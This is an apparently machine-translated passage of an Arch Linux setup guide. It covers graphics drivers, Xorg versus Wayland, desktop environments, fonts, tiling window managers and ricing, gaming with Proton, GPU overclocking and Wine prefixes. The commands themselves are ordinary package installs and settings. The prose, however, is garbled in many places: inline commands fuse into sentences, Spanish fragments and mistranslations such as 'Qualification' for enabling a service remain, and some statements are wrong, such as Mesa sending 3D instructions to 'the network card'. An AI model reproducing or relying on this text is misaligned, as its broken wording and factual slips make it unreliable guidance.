The Linux kernel includes modules (low-level drivers) for the vast majority of hardware. However, to translate 3D instructions (such as OpenGL or Vulkan) from programs to the network card, we use Mesa . Mesa is a colossal open-source software project that provides open-source implementations of graphics APIs. If you have an integrated AMD (Radeon) or Intel graphics card, Mesa is the absolute gold standard; it offers outstanding performance and native stability.

Install the Mesa stack:

sudo pacman -S mesa

(Note about NVIDIA: If you have a discrete NVIDIA graphics card, its official driver is proprietary and closed. It does not use Mesa for OpenGL. Detailed installation and configuration of NVIDIA drivers are covered extensively in Chapter 8: Gaming. For now, Mesa will provide basic graphics if you use Nouveau, NVIDIA's open-source driver.)

6.2 The Display Server: Xorg vs Wayland ↑ Home

Once we can communicate with the GPU, we need a master program that manages the physical screen, keyboards, mice, and provides a blank canvas for applications to draw their windows.

6.2.1 El Viejo Rey: X Window System (X11 / Xorg)

Developed in 1984 at MIT, X11 has been the standard for almost 40 years. It is a network system (client-server architecture) in which programs (clients) send instructions to the X server to draw.

• Pros: It works everywhere. Thousands of older programs rely on it. It's highly stable.
• Cons: Its codebase is gigantic, archaic, and bloated. It lacks basic security isolation (any X11 program can spy on your keystrokes (keylogger) in another X11 program). Screen tearing is an inherent problem due to its design, unless you use a powerful external compositor.

6.2.2 The New Paradigm: Wayland

Wayland is not a server; it's a modern "protocol" that defines how the screen should be drawn. In the Wayland paradigm, the Desktop Environment (e.g., GNOME or KDE) acts as both the compositor and the server.

• Pros: It's ridiculously fast and smooth. It completely eliminates screen tearing by ensuring every frame is perfect before being sent to the screen. It's secure by design (a Wayland program can't view another program's window without the user's permission via security portals). It handles different monitors with varying refresh rates (e.g., one at 144Hz and another at 60Hz) and different DPI settings flawlessly, something that completely breaks X11.
• Cons: Some very specific or older applications (such as screen capture software designed only for X11) still require compatibility through a bridge called Xwayland.

The Verdict on Arch Linux: Wayland is the present and the future. All the modern desktop environments we'll explore support Wayland by default.

6.3 The Display Manager ↑ Home

A Display Manager (DM), also known as a login manager, is the first graphical interface you see when you boot your computer. Its job is to show you a visually appealing screen, ask for your password, authenticate you through Pluggable Authentication Modules (PAMs), and, if the login is successful, launch the Desktop Environment with your user privileges.

Although technically you could log in from the black console and type startxTo start Wayland manually, a DM is essential for a modern desktop experience. The most professional DMs are:

1. SDDM (Simple Desktop Display Manager): The recommended display manager for KDE Plasma. Modern, based on Qt, and with full experimental support for running natively under Wayland.
2. GDM (GNOME Display Manager): The GNOME standard. Extremely polished, integrated into the GNOME suite, but resource-intensive.
3. LightDM: The long-standing standard for lightweight desktops (like XFCE). It uses X11 under the hood and is incredibly fast.

The Display Manager is installed simultaneously with the desktop environment, as each environment typically requires its own for optimal screen lock integration.

6.4 Desktop Environments: Installation and Architecture ↑ Home

A Desktop Environment (DE) is a massive collection of software (window manager, control panel, file explorer, calculators, image viewers) designed to work seamlessly together. In Arch, we install metapackages (packages that don't contain software themselves, but rather lists of dependencies to download the entire ecosystem at once). Choose only one for your initial installation.

6.4.1 KDE Plasma (The Customizable Colossus)

Developed in C++ using the Qt framework, KDE Plasma is renowned for being the most customizable desktop environment in the Linux world. Ironically, despite its stunning visuals, recent versions have optimized memory (RAM) usage to levels that rival traditional lightweight desktops. Plasma is leading the way in the adoption of Wayland.

Installation:

# Instalamos Plasma, el gestor SDDM y las aplicaciones base de KDE (Dolphin, Konsole)
sudo pacman -S plasma-meta kde-applications-meta sddm

Enabling: We must tell systemd to start the login screen (SDDM) on the next boot:

sudo systemctl enable sddm.service

6.4.2 GNOME (The Modern Paradigm)

GNOME (developed in C using GTK) takes a different approach. Heavily inspired by macOS, it eliminates the traditional taskbar, the concept of minimizing windows, and the icon-based desktop in favor of a workflow based on dynamic workspaces and a central Activities dashboard. It is the default desktop environment in Fedora and Ubuntu Enterprise. GNOME is intentionally rigid: its developers believe that a carefully curated design should not be indiscriminately altered.

Installation:

sudo pacman -S gnome gnome-extra gdm

Qualification:

sudo systemctl enable gdm.service

6.4.3 XFCE (The Immortal Classic)

XFCE is the king of stability and low power consumption. If you're reviving a 2012 laptop or simply want your environment to remain unchanged, XFCE (based on GTK) is the choice for you. It still uses X11 and does not support Wayland.

Installation:

sudo pacman -S xfce4 xfce4-goodies lightdm lightdm-gtk-greeter

Qualification:

sudo systemctl enable lightdm.service

6.5 Typography and Font Rendering (Fontconfig) ↑ Home

A very common mistake among Arch Linux newbies is installing a desktop environment and noticing that web pages appear "blocky," distorted, or that applications look like they're from the 1990s. Why does this happen? Ubuntu and Manjaro install hundreds of fonts by default. Arch Linux doesn't install any fonts by default (KISS principle). If a web browser tries to render Arial font and your system doesn't have Arial (or a replacement font configured), the screen will display unreadable boxes or the most basic font the kernel can find.

6.5.1 Installation of Base Power Supplies

The font rendering engine in Linux consists of FreeType2 and Fontconfig. To power this engine, we need to install a robust font library:

# Fuentes libres, soporte emoji, y fuentes coreanas/japonesas/chinas (cjk) para evitar caracteres rotos en la web
sudo pacman -S ttf-dejavu ttf-liberation noto-fonts noto-fonts-emoji noto-fonts-cjk

6.5.2 Microsoft Fonts (Core Fonts)

Regardless of your ideological stance on free software, the modern web was built assuming users have Windows fonts (Arial, Times New Roman, Comic Sans, Trebuchet). Many PDF documents from companies or universities become distorted on Linux if you open the file in LibreOffice and the system doesn't find "Times New Roman." Since these fonts are licensed under Microsoft's proprietary license, they can't be in the official Arch repositories, but you can (and should) install them through the AUR:

yay -S ttf-ms-fonts

Once installed, you can refresh the font cache manually (although the package manager usually does this) with the command:

fc-cache -fv

6.5.3 Cursor and Icon Theme

Finally, to give the desktop a cohesive look (especially outside of GNOME, which comes with its own tightly integrated icons), it's recommended to install complete icon packs. The modern gold standard is papirus-icon-theme.

sudo pacman -S papirus-icon-theme

Your machine is ready. One simple order, rebootThis will take you, for the first time, out of the abyss of the pure terminal. You'll be greeted by your DM login screen. As you enter your password, the magic will happen, and your Arch Linux graphical workstation will spring to life with performance that users of generic operating systems rarely experience.

6.6 Underlying Infrastructure: DBus and XDG Desktop Portals ↑ Home

When we moved from the archaic X11 (where any program had implicit administrator permission over the screen) to Wayland (where everything is isolated or sandboxed), a massive engineering problem arose: How does a program like OBS Studio record your screen if the Wayland compositor (the head of security) explicitly forbids it?

The answer is XDG Desktop Portals . These portals are standardized API interfaces (independent of whether you use GNOME, KDE, or Hyprland) that applications use to "request permission" from the user via the system bus (DBus).

6.6.1 Screen Sharing Architecture

To enable screen sharing in Google Meet or Discord using Wayland, the web application utilizes the WebRTC standard . WebRTC sends a DBus signal requesting screen access. The "Portal" intercepts this signal and draws a native window of your desktop, asking: "Firefox is requesting to record Monitor 1. Do you accept?"

If you have a pre-built desktop environment like GNOME, this is already installed. But if you built your system manually, you need to install the portal backend for your environment.

# Para KDE Plasma:
sudo pacman -S xdg-desktop-portal-kde
# Para Hyprland:
sudo pacman -S xdg-desktop-portal-hyprland

Additionally, you need the "base" portal that serves as a router and the compatibility layer for GTK applications (such as Firefox):

sudo pacman -S xdg-desktop-portal xdg-desktop-portal-gtk

Once installed, if you run OBS Studio and add a capture source, you won't choose "XSHM Capture," but rather Screen Capture (PipeWire) . PipeWire, as we saw in Chapter 4, not only routes audio, but also routes the raw video stream directly from the Compositor to OBS at 60 FPS without any loss of quality or latency.

6.6.2 DBus: The Desktop Nervous System

DBus is the system message bus. If your laptop battery drops to 10%, the kernel sends a signal. DBus picks it up, finds which program is listening for power events (your desktop environment), and delivers the message so it can display a red warning on your screen. You can inspect this alien traffic in real time using auditing tools.

# Instalar herramienta visual de DBus
sudo pacman -S d-spy

You'll see that every program (Spotify, Firefox, the network manager) publishes objects on the DBus network. A hacker or advanced sysadmin can send fake messages over DBus using the command dbus-sendto pause the music, lock the screen, or force the system to sleep without using the graphical interface.

6.7 Hardware Video Acceleration (VA-API) ↑ Home

One of the most silent yet destructive flaws of a poor Arch Linux installation is software rendering in browsers. If you play a 4K video on YouTube and notice your laptop getting incredibly hot and the fans running at full speed, your browser isn't using your GPU's dedicated video decoder. It's using the raw CPU (software rendering) to calculate each pixel of the video.

The standard API in Linux for decoding H.264, VP9 or AV1 videos using the graphics card is called VA-API (Video Acceleration API) .

6.7.1 Enabling on Intel and AMD GPUs

# Para procesadores Intel modernos (Broadwell o superior)
sudo pacman -S intel-media-driver
# Para AMD Radeon
sudo pacman -S libva-mesa-driver

To check if your hardware can decode, install the libva utilities:

sudo pacman -S libva-utils
vainfo

The output will spit out dozens of profiles (e.g. VAProfileVP9Profile0). It is said VAEntrypointVLDThis means that the hardware supports perfect decoding.

6.7.2 Forcing Acceleration in Firefox and Chromium

Despite having the drivers, browsers on Linux disable them by default for fear of causing crashes on faulty hardware.

• In Firefox: Type about:configin the address bar. Search media.ffmpeg.vaapi.enabledand change it to trueAlso search gfx.webrender.alland put it in true.
• En Chromium/Chrome: Abre chrome://flagsSearch Hardware-accelerated video decodeand force him to Enabled.

Play a 4K video. Your CPU load will drop from 80% to 3%, and your battery will last 4 hours longer.

6.8 Color Management and ICC Profiles (Colord) ↑ Home

If you're a photographer, graphic designer (using Darktable or GIMP), or video editor in DaVinci Resolve, you know that your monitor can be deceiving. A red on your screen isn't necessarily the same as the standard red used in printing. To correct this, hardware colorimeters (like the X-Rite i1Display) are used, which generate color profile calibration files. .icc.

Linux has a central daemon for color management called colord .

sudo pacman -S colord

In environments like GNOME, color management is natively integrated into the control panel. You select your monitor, load your file .iccand GNOME adjusts the GPU gamma curves (LUT) automatically.

In Wayland, the color management implementation is an extremely aggressive protocol under development. Professional compositors (such as those designed for the Wayland Color Management Protocol) ensure that 10-bit HDR (High Dynamic Range) color is not modified by XWayland or altered on its way to the monitor, enabling cinematic-grade editing on Arch Linux with greater accuracy than macOS.

Chapter 7: Advanced Window Managers and the Art of Ricing ↑ Home

While KDE and GNOME (Chapter 6) offer the convenience of an all-inclusive hotel, many power users, programmers, and UNIX enthusiasts find traditional desktop environments slow and restrictive. The radical alternative is to use a standalone window manager .

On traditional desktops, windows are "floating" (stacked); you can drag them, resize them with the mouse, and hide them behind one another. Advanced Window Managers use the Tiling philosophy . In tiling, the window manager mathematically calculates your monitor's space and divides the windows into a perfect tile that occupies 100% of the usable space without overlaps. You navigate, close, and move windows exclusively with keyboard shortcuts . The mouse becomes optional. Initially, the learning curve is steep, but once your muscle memory assimilates the shortcuts, productivity skyrockets (and RAM consumption drops from gigabytes to a mere 200MB).

7.1 Tiling Managers in X11 (The Old School) ↑ Home

If you want to maintain maximum compatibility with older software or if your hardware struggles under the new Wayland protocol, Tiling WMs in X11 are your playground.

7.1.1 i3wm: The Binary Tree

i3(and his successor) i3-gapsThe Tiling Window is the most famous Tiling Window in Linux history. Its mental structure is based on a tree. When you open a terminal, it occupies the entire screen. If you open a browser, the screen is split in two (50% and 50%). The brilliance of i3The reason is that its configuration file is incredibly readable plain text, requiring no programming knowledge.

Installation:

sudo pacman -S xorg-server xorg-xinit i3-wm i3status dmenu alacritty

• xinitIt allows you to start the graphical environment without using a heavyweight Display Manager (SDDM).
• dmenuIt's a minimalist search engine for launching programs by typing their name.
• alacrittyIt is a modern and ultra-fast terminal emulator (written in Rust and GPU accelerated).

Initial i3 Setup: To start it, you create a hidden file in your user directory called .xinitrc.

echo "exec i3" > ~/.xinitrc

From the TTY, you write startxOn the first boot, i3 will generate its master configuration file in ~/.config/i3/configIt will ask you to choose the modifier key (ModKey), which is usually the "Windows/Super" or "Alt" key. From there, Mod+Enteropens terminals; Mod+dOpen the menu; Mod+Shift+qclose windows.

7.1.2 bspwm: The Empty Containers Paradigm

While i3 handles the divisions for you based on the active approach, bspwm(Binary Space Partitioning Window Manager) separates the window manager from the keyboard shortcuts. bspwmIt only manages the windows; you use a separate daemon called sxhkdto capture your keystrokes and send commands. It's the preferred option for hardcore "Ricers" in X11 because of its programmatic malleability through bash scripts.

7.2 Wayland Composers: Hyprland (The Immersive Future) ↑ Home

An X11 user base picom(a separate demon) to add shadows, transparencies, and rounded edges to i3wmThis often resulted in lag and screen tearing. In Wayland, the window manager is the graphics compositor (all in one), enabling animations as smooth as those on a high-end smartphone (true 120Hz).

Hyprland is the dynamic Wayland compositor that has revolutionized the community. It is based on wlroots(the backend created by the authors of the Sway compositor) but heavily modified in C++ to prioritize visual aesthetics (Glassmorphism effect, customizable animations with Bézier curves, rich shadows and real-time Gaussian blur of the terminal).

7.2.1 Hyprland Stack Installation

Unlike i3, installing Hyprland requires specific components designed for Wayland (since dmenuor X11 wallpaper managers will not work).

sudo pacman -S hyprland kitty waybar wofi hyprpaper dunst

• kitty: GPU-accelerated terminal emulator with excellent Wayland support (Alacritty also works).
• waybarThe highly customizable top status bar.
• wofi: Wayland's native application launcher.
• hyprpaper: Utility for rendering hyper-fast wallpapers.
• dunst: The notification daemon that draws pop-ups on the screen.

Booting Hyprland: Just like in i3, you don't need a session manager (SDDM). From the terminal (TTY), simply type:

Hyprland

And you'll be greeted by a crystal environment, elastic animations, and instant integration with Wayland.

7.3 The Art of "Ricing" and Dotfile Configuration ↑ Home

The act of taking a minimalist operating system (i3wm or Hyprland) and meticulously configuring every text file, font, spacebar, and hexadecimal color to create a unified and spectacular themed desktop is called "Ricing" (a slang term derived from extreme car customization). A "Ricing" system is a reflection of its user's technical soul.

The files you manipulate for this art are known as Dotfiles , since in Linux any folder or file that begins with a dot ( .) is hidden (for example, .config/).

7.3.1 Hyprland Anatomy.conf

In Hyprland, your life revolves around ~/.config/hypr/hyprland.confUnlike XML or JSON, it is a sequential text file that the composer reads on the fly (you can edit the file and see the changes reflected instantly without reloading).

Example of how a "Ricer" would adjust the overall aesthetic:

general {
    gaps_in = 5               # Espacio interior entre ventanas
    gaps_out = 20             # Espacio exterior a los bordes del monitor
    border_size = 2
    col.active_border = rgba(33ccffee) rgba(00ff99ee) 45deg # Borde gradiente arcoíris
    col.inactive_border = rgba(595959aa)
}

decoration {
    rounding = 10             # Bordes redondeados de Apple/Windows 11
    blur {
        enabled = true        # Efecto cristal translúcido detrás de las ventanas
        size = 8
        passes = 3            # Desenfoque gausiano profundo y pesado
    }
    drop_shadow = yes
    shadow_range = 4
}

7.3.2 Nerd Fonts (Icons in Text)

If you open waybarOr if you look at the configuration of advanced user terminals, you'll see that they use weather icons, hard drive icons, and Wi-Fi logos embedded directly into the programming code. How do they do it without using images? The answer is Nerd Fonts . These are popular typefaces (like JetBrains Mono, Fira Code, or Hack) that have been patched by injecting thousands of vector icons from FontAwesome, Material Design, and DevIcons.

To have a spectacular terminal and status bars, you should install packages from Nerd Fonts (many have recently moved to the official repositories):

sudo pacman -S ttf-nerd-fonts-symbols ttf-jetbrains-mono-nerd ttf-fira-code-nerd

Then, you tell your terminal ( ~/.config/kitty/kitty.conf) that uses that font:

font_family      JetBrainsMono Nerd Font
bold_font        auto
italic_font      auto
font_size        12.0

7.3.3 Waybar: The Programmable Toolbar

Waybar is the standard in Wayland. It is configured using JSON syntax ( ~/.config/waybar/config) for the arrangement of the modules (clock, RAM usage, battery, Hyprland workspaces) and is styled using CSS ( ~/.config/waybar/style.cssThis allows web developers to create bars identical to those on macOS or futuristic interfaces without learning new languages.

You can create "Custom Modules" that run a bash script every 10 seconds to search the internet for information (e.g., Bitcoin price or your city's temperature) and print it to the bar, giving the system unlimited versatility.

7.4 Version Control for Dotfiles (GNU Stow) ↑ Home

Once you've invested three weeks designing the perfect desk and your hyprland.conf, your scripts from waybarand the keyboard shortcuts for kittyThey are a unified work of art, but you face a problem: If your hard drive dies, you'll lose months of micro-tuning. Professionals use GitHub to make public backups of their Dotfiles (just search "Hyprland dotfiles" on GitHub to find thousands).

But how do you synchronize an isolated folder like ~/.config/hypr/and another one like ~/.config/waybar/to a single Git repository without dragging along secret configurations (such as browser passwords that also reside in .config)?

The ultimate hacker solution is GNU Stow (a symlink manager).

1. Instalas Stow: sudo pacman -S stow
2. You create a central repository folder, e.g. ~/MisDotfiles.
3. Inside, you replicate the structure: ~/MisDotfiles/hyprland/.config/hypr/hyprland.conf
4. From your Home directory, you execute stow hyprland -t ~ -d ~/MisDotfiles.

Stow will create a symbolic link (a tunnel) from your actual directory to the Git repository. Now you can initialize git init in ~/MisDotfilesupload your files to the cloud, and when you install Arch Linux on a new laptop, you'll just need to clone the repository and run stow *so that your entire hyper-configured visual environment can be assembled in just 3 seconds.

This is the true power of Arch Linux: the operating system is not a black box; it is plain text at your service.

7.5 Inter-Process Communication (IPC) and Absolute Control ↑ Start

The defining feature that separates a tiling window manager (like Hyprland or bspwm) from a monolithic environment (like Windows) is IPC (Inter-Process Communication). The window manager opens a socket (an internal network tunnel) through which any script on your PC can send it instant commands.

7.5.1 Mastering hyprctl

In Hyprland, the command tool is hyprctlFrom any terminal, you can order the graphics compositor to perform physical actions.

• Move to workspace 5: hyprctl dispatch workspace 5
• Make the current window float: hyprctl dispatch togglefloating
• Launch a specific application ignoring rules: hyprctl dispatch exec firefox

The real magic happens when you request information (telemetry). If you run:

hyprctl clients -j

Hyprland will output a huge, structured block of JSON containing the exact X/Y coordinates, PID, size, and state of each window on your screen. A bash or python developer can parse this JSON (using jq) and write a script that, for example, detects if Spotify is open and automatically moves it to Monitor 2, resizing it to 30% of the width.

7.5.2 Event Hooks (Listening to the Composer)

Instead of asking "what's happening," you can connect a cable directly to the composer's brain so it can inform you in real time (event-driven). Hyprland transmits all its events to the UNIX socket located at /tmp/hypr/$HYPRLANDINSTANCESIGNATURE/.socket2.sock.

We can use socatto listen to this constant stream of data:

sudo pacman -S socat
socat -U - UNIX-CONNECT:/tmp/hypr/$HYPRLAND_INSTANCE_SIGNATURE/.socket2.sock

By leaving this running, if you switch windows or close a program, you'll see text appear live (e.g. activewindow>>Firefox). The "Ricers" use this to make their top bar ( waybar) reacts in milliseconds, changing the colors of the icons when the user moves between screens.

7.5.3 Demonization (Systemd User Services in WMs)

In a traditional desktop environment, the system automatically starts your notification daemon and wallpaper. In a pure desktop tiling environment, you must start them. A common rookie mistake is writing lines... exec-once = dunst &in the configuration file. If the program crashes, it will not restart.

The expert way is to delegate the startup of desktop tools to your systemd user (Chapter 10). You create units ~/.config/systemd/user/waybar.service and ~/.config/systemd/user/hyprpaper.serviceThe Window Manager only loads the screen; systemd takes care of monitoring, restarting, and logging every piece of your Rice system, ensuring industrial-grade stability.

7.6 The HiDPI Nightmare and Multi-Monitor Solutions ↑ Home

If you have a 1080p monitor and a 4K monitor side-by-side, you've entered the territory where Windows and macOS traditionally struggle, and where X11 fails catastrophically. In X11, the entire combined display (the two physical screens) is considered a single "X Screen." You can't tell X11 to scale the 4K monitor to 200% and the 1080p monitor to 100%. The 4K windows will appear tiny, or the 1080p windows will appear gigantic.

Wayland, thanks to its modern architecture (drm/KMS), treats each screen as an absolutely independent canvas with an isolated memory buffer.

7.6.1 Fractional Scaling in Wayland

If you have a 1440p (2K) monitor, 100% scaling makes the text small, and 200% makes it ridiculously large. You need 150% (fractional scaling). In your compositor's settings (e.g., Hyprland in hyprland.conf):

# Monitor 1 (4K) a 144Hz escalado al 200%
monitor=DP-1,3840x2160@144,0x0,2

# Monitor 2 (1440p) a 60Hz a la derecha, escalado al 150%
monitor=HDMI-A-1,2560x1440@60,1920x0,1.5

XWayland Warning: Older applications that don't understand Wayland (like some games or older Electron programs) run on top of XWayland. When Wayland scales fractionally (1.5x), XWayland essentially tells the program to "draw at normal resolution," and then Wayland stretches the image by 150%, resulting in blurriness. To avoid this, you must force all your applications (Firefox, VSCode, Discord) to use the native Wayland backends.

For Electron applications (VSCode, Discord), run them by adding the magic flags:

code --enable-features=UseOzonePlatform --ozone-platform=wayland

The text will automatically stop being blurry and will be rendered sharply by your GPU's vectors.

7.6.2 Headless Virtual Monitors (Software KVMs)

An advanced administrator trick: If you have a powerful laptop with a broken screen or an Arch server in a closet, you can use Wayland to create a monitor that doesn't physically exist. Using IPC commands (e.g. hyprctl output create headless), the compositor generates a 4K video buffer in RAM.

Then, you can use an advanced remote desktop protocol (like Sunshine/Moonlight or WayVNC) to capture that invisible buffer and send it over your local network to your iPad, Smart TV, or lightweight laptop. You'll be utilizing 100% of the server computer's graphics card power (playing AAA games at ultra settings) while receiving the compressed video in real time on a low-power device in the living room.

This architecture turns any Arch Linux machine into a private visual computing cloud server.

Chapter 8: Gaming and Extreme Graphics Performance ↑ Home

In the last decade, Linux has gone from being a desolate wasteland for gaming to becoming the base platform for the most successful handheld console (Steam Deck). Arch Linux, thanks to its Rolling Release model, is indisputably the best distribution for gaming: you have access to the latest kernel and graphics drivers the moment hardware manufacturers release them, providing massive FPS (Frames Per Second) improvements for recently released (Day-1) titles.

In this chapter we will analyze the inner workings of graphics drivers, the Proton translation layer, and the performance utilities that can make a game run better on Arch than on Windows.

8.1 Kernel-Level Graphics Drivers (KMS/DRM) ↑ Home

For serious gaming, open-source drivers mesaBasic settings are not always sufficient or require adjustments to take full advantage of hardware acceleration.

8.1.1 AMD (Radeon) Architecture

If you have an AMD graphics card, you're in Linux paradise. AMD keeps its drivers open source and invests heavily in the kernel. There are two kernel modules for AMD: the obsolete one radeonand the modern amdgpuMake sure the repository [multilib]It is enabled (as we saw in Chapter 5) and installs the AMD-specific Vulkan implementation (RADV) provided by Mesa:

sudo pacman -S mesa lib32-mesa vulkan-radeon lib32-vulkan-radeon

Technical note: RADV (Radeon Vulkan) is the open-source implementation sponsored by Valve. There is another official one from AMD called amdvlkHowever, RADV consistently offers better performance and lower latency in games.

8.1.2 NVIDIA Architecture (Proprietary Drivers and DKMS)

NVIDIA has historically provided poor open-source support (the free driver nouveauIt's useless for modern gaming because NVIDIA locked the clock frequencies. On Arch, you're forced to install NVIDIA's proprietary and closed driver.

The problem with Kernel updates: When you install the standard package nvidiaThis is precompiled solely and exclusively for the latest version of the official kernel ( linux). If you use a custom kernel such as linux-zenIf you're using the LTS kernel and pacman updates that kernel, your NVIDIA driver will break, leaving you with a black screen upon restart. The professional solution: DKMS (Dynamic Kernel Module Support). DKMS will automatically recompile the NVIDIA graphics card module whenever pacman detects a kernel update, regardless of which kernel you're using.

Install the proprietary battery with DKMS:

sudo pacman -S nvidia-dkms nvidia-utils lib32-nvidia-utils

Enable DRM Modesetting (Critical for Wayland and Anti-Tearing): For NVIDIA to function correctly under modern compositors like Hyprland or GNOME Wayland, and to prevent screen tearing in X11, you must enable the KMS parameter in the Kernel. Open /etc/default/gruband look for the line GRUBCMDLINELINUX_DEFAULTAdd nvidia-drm.modeset=1:

GRUB_CMDLINE_LINUX_DEFAULT="loglevel=3 quiet nvidia-drm.modeset=1"

Rebuild GRUB: sudo grub-mkconfig -o /boot/grub/grub.cfgand restart.

8.2 The Proton Revolution and Translation APIs (DXVK / VKD3D) ↑ Home

The vast majority of high-budget commercial games are programmed for DirectX , a proprietary and closed graphics API for Microsoft Windows. A DirectX game cannot communicate with Linux or its native API, Vulkan .

comes in This is where Proton , a massively modified fork of Wine funded by Valve. Proton intercepts the game's DirectX calls in real time and translates them into Vulkan instructions using translators.

• DXVK: Translate DirectX 9, 10 and 11 to Vulkan.
• VKD3D-Proton: Translates the highly complex DirectX 12 to Vulkan.

Thanks to Vulkan's extreme efficiency, since Linux has fewer background processes than Windows (lower "overhead"), translation often occurs with a 0% performance penalty, and in many cases, the translated game performs better than the original on Windows.

8.2.1 Steam Installation and Proton Configuration

Steam on Linux is a native application, but most games are not.

sudo pacman -S steam ttf-liberation

Launch Steam, log in, and go to Settings > Compatibility . Check the boxes:

1. Enable Steam Play for supported titles.
2. Enable Steam Play for all other titles. (Allows you to run ANY Windows game).
3. Select "Proton Experimental" or the latest stable numbered version as your default global tool.

Steam will prompt you to restart. Now the "Install" button will be enabled for every game in your library, regardless of the original operating system.

8.2.2 Games outside of Steam: Lutris and Heroic

For games from Epic Games, GOG, Amazon Games, or installers .exeLoose, Steam won't do.

• Lutris: It's the ultimate game manager for Linux. It manages community-created scripts that automatically download obscure Windows dependencies (like old C++ libraries or fonts) so that a game runs perfectly with just one click.

    sudo pacman -S lutris

• Heroic Games Launcher: The unofficial (and far superior) open-source client for Epic Games and GOG. It downloads and installs games and lets you inject custom versions of Proton (such as Proton-GE, maintained by GloriousEggroll, which includes Windows Media video codecs that Valve can't include due to legal issues).

    yay -S heroic-games-launcher-bin

8.3 Maximizing Performance (FPS) and Tool Injection ↑ Home

On Linux, you have complete control over your hardware resources. The community has developed tools (used extensively on the Steam Deck) to encapsulate games, trick them, and squeeze every last bit of CPU bandwidth out of them.

8.3.1 Feral GameMode (Automatic System Overclocking)

GameMode is a system daemon that, when a game starts, requests permission from systemd to raise the game process priority, switches the CPU Governor to "Performance" mode (so the cores don't throttle to save battery), disables screen savers, and can even run custom scripts (such as disabling the X11 graphics compositor). When the game is closed, it returns the system to its normal state.

Installation:

sudo pacman -S gamemode lib32-gamemode

To use it in a Steam game, right-click on the game > Properties > Launch Options, and add:

gamemoderun %command%

8.3.2 Gamescope (The Micro-Compositor)

A common problem when gaming on Linux is that the game tries to change the resolution of the entire monitor (ruining the desktop) or that the mouse cursor wanders to a second monitor mid-battle. Gamescope creates an isolated window (a nested Wayland server) that tricks the game into thinking it's the only one in existence. Gamescope is brilliant because it includes FSR (FidelityFX Super Resolution) at the system level . You can tell Gamescope to render a very demanding game at 720p internally and then use AI to upscale it to 1440p (or 4K) on your monitor. The game will think it's running at 720p and give you triple the FPS, while you see it at near-native resolution.

Installation:

sudo pacman -S gamescope

Usage in Steam Launch Options (Internal rendering 1080p, output scaling 1440p using FSR):

gamescope -h 1080 -H 1440 -U -f -- %command%

( -Uactive FSR, -f(Full screen force).

8.3.3 Real-Time Telemetry (MangoHud)

You see those YouTube videos comparing graphics cards where a detailed graph appears in the top left corner showing temperature, VRAM usage, and an FPS graph? That's MSI Afterburner on Windows. On Linux, we use the vastly superior MangoHud , which is injected directly into the Vulkan/OpenGL call.

Installation:

sudo pacman -S mangohud lib32-mangohud

To activate it in a Steam game, go to launch options:

mangohud %command%

(And yes, you can chain the commands together: mangohud gamemoderun %command%).

8.4 The Last Bastion: Anti-Cheats ↑ Home

All of the above sounds like technological magic, and it is. Today, Cyberpunk 2077, Elden Ring, Red Dead Redemption 2, or Baldur's Gate 3 will run on Arch Linux at Ultra settings with 60+ FPS without you having to open a single terminal. The only real problem for gaming on Linux is competitive multiplayer games.

To prevent players from cheating, companies like Riot Games (Valorant, League of Legends) and Activision (Call of Duty) use anti-cheat programs (such as Vanguard and Ricochet) that are installed at the Windows kernel level (Ring 0) . They function as legal rootkits. When attempting to run these games through Proton on Linux, the anti-cheat program panics because it cannot locate the Windows kernel files and immediately bans or blocks the user. These games are unplayable on Linux.

However, the industry's most popular anti-cheat systems, EasyAntiCheat (EAC) and BattlEye , announced official, native support for Linux and Proton. Competitive games like Apex Legends, The Finals, and Counter-Strike 2 (native) run flawlessly on Arch Linux.

The must-visit website for any Arch gamer is ProtonDB ( protondb.comBefore buying or downloading a game, look it up there; the community will tell you if it works out of the box (Platinum/Gold level) or if the developer has intentionally blocked the anti-cheat ("Borked" level).

8.5 Thermal and Energy Control: Overclocking and Undervolting ↑ Home

A system administrator or enthusiast gamer won't accept the factory default clock speeds and voltages. Undervolting a graphics card can lower temperatures by 10 degrees Celsius and reduce fan noise to zero, while maintaining the exact same performance.

8.5.1 AMD Environment (AMDGPU Sysfs and CoreCtrl)

The open source driver amdgpuIt exposes almost all of its telemetry and control levers through the virtual file system ( /sys/class/drm/card0/device/You can overclock simply by writing numbers to text files, but it's dangerous and tedious. To do it safely and intuitively, we installed CoreCtrl , the Linux equivalent of MSI Afterburner.

sudo pacman -S corectrl

For CoreCtrl to be able to manipulate voltages, we must boot the kernel by passing it an explicit parameter that relaxes the AMD driver's security restrictions. Open /etc/default/gruband adds to GRUBCMDLINELINUX_DEFAULT:

amdgpu.ppfeaturemask=0xffffffff

Regenerate GRUB and reboot. Upon opening CoreCtrl, you'll see adjustable fan curves via graphical nodes, 3D profiles, and the ability to set your card's maximum wattage (Power Limit) from 200W to 150W, achieving dramatic energy efficiency gains without sacrificing FPS.

8.5.2 NVIDIA Environment (Coolbits and GreenWithEnvy)

NVIDIA blocks overclocking on Linux unless you enable a secret, hidden flag in the X11 graphics server configuration file (or its Wayland equivalent). This "God" mode is called Coolbits .

To activate it in X11, the NVIDIA configuration file is generated and the value 31 is injected (which adds overclocking permissions, fans and voltages):

sudo nvidia-xconfig --cool-bits=31

is installed Next, an application from the AUR called GreenWithEnvy (GWE) :

yay -S gwe

With GWE, you can alter the core clock (Core Clock Offset) and VRAM (Memory Offset) clocks. A 500MHz increase in VRAM on 3000 or 4000 series graphics cards typically provides a 5% to 10% increase in FPS without any additional thermal load.

8.6 Understanding the Wine Sub-Architecture ↑ Home

Not everything in life revolves around playing games through Steam (Proton). Many Arch Linux users rely on highly specialized Windows software (music production DAWs like FL Studio/Ableton, CAD modeling tools, or Adobe suites). To run these powerful programs, we don't use generic Wine. We manipulate the prefixes .

8.6.1 The Concept of the Isolated WINEPREFIX

A Wine prefix is ​​a folder on your hard drive that simulates the disk C:\from a Windows machine. By default, if you run wine programa.exeEverything will be installed in ~/.wine/This is a huge mistake. If you install 10 programs with the same prefix, the DLLs will start overwriting each other and creating insurmountable conflicts.

The iron law: Every heavy application must have its own isolated prefix.

# Crear un prefijo "C:\ limpio" específicamente para FL Studio
WINEPREFIX=~/.wine-flstudio winecfg

This command will open a Windows 10 settings window and create a disk C:\virgin in that hidden folder.

8.6.2 Winetricks and DLL Manipulation

When you install FL Studio, it will likely crash silently when you try to launch it. Why? Because FL Studio expects your "Windows" to have the Microsoft C++ Redistributable Libraries and certain native fonts that the installer assumes are included. Since Wine is legally reverse-engineered, it doesn't include Microsoft's proprietary code. To inject it, we use Winetricks , a magic script.

sudo pacman -S winetricks

To silently download and inject the .NET Framework 4.8, DirectX 9, and Microsoft fonts (Arial, etc.) into our FL Studio container:

